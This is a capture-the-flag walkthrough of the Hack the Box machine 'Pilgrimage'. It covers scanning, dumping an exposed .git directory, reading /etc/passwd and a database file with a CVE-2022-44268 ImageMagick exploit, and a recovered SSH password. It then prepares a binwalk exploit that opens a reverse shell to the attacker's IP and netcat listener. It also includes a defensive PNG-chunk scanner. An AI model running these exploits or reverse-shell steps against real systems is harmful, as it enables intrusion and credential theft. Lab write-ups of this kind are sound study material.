Hack the Box - Pilgrimage

Port Scan

rustscan -a 10.10.11.219 -r 0-65535 --ulimit 5000

Service Scan

nmap -sV -sC -A --min-rate 1000 10.10.11.219 -p 22,80

HTTP

/index.php

http://pilgrimage.htb/index.php

/login.php

http://pilgrimage.htb/login.php

/register.php

http://pilgrimage.htb/register.php

/.git

http://pilgrimage.htb/.git/

Dump /.git

git-dumper http://pilgrimage.htb/.git/ git

Interaction

Create Account

Login

Dashboard

http://pilgrimage.htb/dashboard.php

Shrink Image

Shrunk Image

Source Code

  • The code uses "magick" to shrink the uploaded image.

Search Exploits

searchsploit magick

Exploit - Magick (Arbitrary File Read): CVE-2022-44268

This vulnerability allows arbitrary files on the server to be read. The suggested exploit is written in Rust; I will be using one written in Python.

https://github.com/kljunowsky/CVE-2022-44268
  • Prepare Payload
python3 CVE-2022-44268.py --image image.png --file-to-read /etc/passwd --output payload.png
  • Upload Payload

  • Payload URL

  • Read Files

python3 CVE-2022-44268.py --url http://pilgrimage.htb/shrunk/64f5b8058a661.png

  • Identified Users

    • root
    • emily
  • The relevant code in /register.php is shown in the screenshot.

  • Prepare a payload and read the file as done in the previous step. I had to modify the script as it was throwing an error; it now returns the output as hex.

python3 CVE-2022-44268.py --url http://pilgrimage.htb/shrunk/64f5bc11c30f2.png | tee data.hex
  • Convert the hex data recovered from the image back into a string.
cat data.hex | xxd -r -p && echo ''

  • Credentials found: emily:abigchonkyboi123
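As an added defensive check that is not part of this writeup: CVE-2022-44268 is triggered by a PNG text chunk whose keyword is "profile", which ImageMagick treats as a file to read and embed in the output. The constructed Python scanner below walks the PNG chunks, verifies each CRC, and returns any such keyword so an upload handler can reject the image before it is handed to magick; the sample PNG and its chunk contents are built inline and are not taken from the box.

```python
import struct
import zlib
# Constructed CVE-2022-44268 detection helper, not the writeup's code: ImageMagick reads a PNG
# text chunk keyed "profile" as a file to embed, so an upload filter can reject that keyword.
PNG_SIG = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}

def iter_chunks(data):
    """Yield (type, body) per chunk, verifying declared lengths and CRCs."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length  # 4 length + 4 type + body + 4 CRC
        body, crc = data[pos + 8:end - 4], data[end - 4:end]
        if end > len(data) or struct.unpack(">I", crc)[0] != zlib.crc32(ctype + body):
            raise ValueError(f"truncated or corrupt chunk at offset {pos}")
        yield ctype, body
        pos = end
        if ctype == b"IEND":
            break

def text_keywords(data):
    """Return (chunk_type, keyword) for every textual chunk in the image."""
    out = []
    for ctype, body in iter_chunks(data):
        if ctype in TEXT_CHUNKS:
            keyword = body.split(b"\x00", 1)[0]  # keyword ends at the first NUL
            out.append((ctype.decode("ascii"), keyword.decode("latin-1")))
    return out

def profile_keywords(data):
    # "profile" is the keyword ImageMagick resolves to a file path (the CVE trigger)
    return [kw for _, kw in text_keywords(data) if kw.lower() == "profile"]

def chunk(ctype, body):
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def build_sample_png(text_chunks):
    """Constructed 1x1 grayscale PNG carrying the given (keyword, text) tEXt chunks."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # one filter byte plus one pixel
    parts = [PNG_SIG, chunk(b"IHDR", ihdr)]
    parts += [chunk(b"tEXt", kw + b"\x00" + txt) for kw, txt in text_chunks]
    parts += [chunk(b"IDAT", idat), chunk(b"IEND", b"")]
    return b"".join(parts)

# Constructed sample: one harmless comment chunk and one chunk with the suspicious keyword.
SAMPLE = build_sample_png([(b"Comment", b"holiday photo"), (b"profile", b"constructed-marker")])
```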

Foothold

ssh emily@10.10.11.219

List Processes

ps -aux

  • Contents of /usr/sbin/malwarescan.sh (screenshot)

  • The bash script uses inotifywait to monitor a directory for newly created files and then uses the binwalk tool to check whether the content of those files contains certain blacklisted phrases.

  • binwalk version 2.3.2

Search Exploits

searchsploit binwalk

searchsploit -m python/remote/51249.py

  • Prepare Payload
python3 51249.py poison.png 10.10.14.61 4444 

  • Rename Exploit
mv binwalk_exploit.png pwnstuff.png
  • Start a netcat listener
rlwrap nc -nlvvp 4444
  • Start a local python server
python -m http.server 9999
  • Upload the payload file (binwalk_exploit.png, renamed above to pwnstuff.png) to the target. Since the bash script malwarescan.sh uses the binwalk tool to scan the images uploaded to the /var/www/pilgrimage.htb/shrunk directory, the payload needs to be placed there.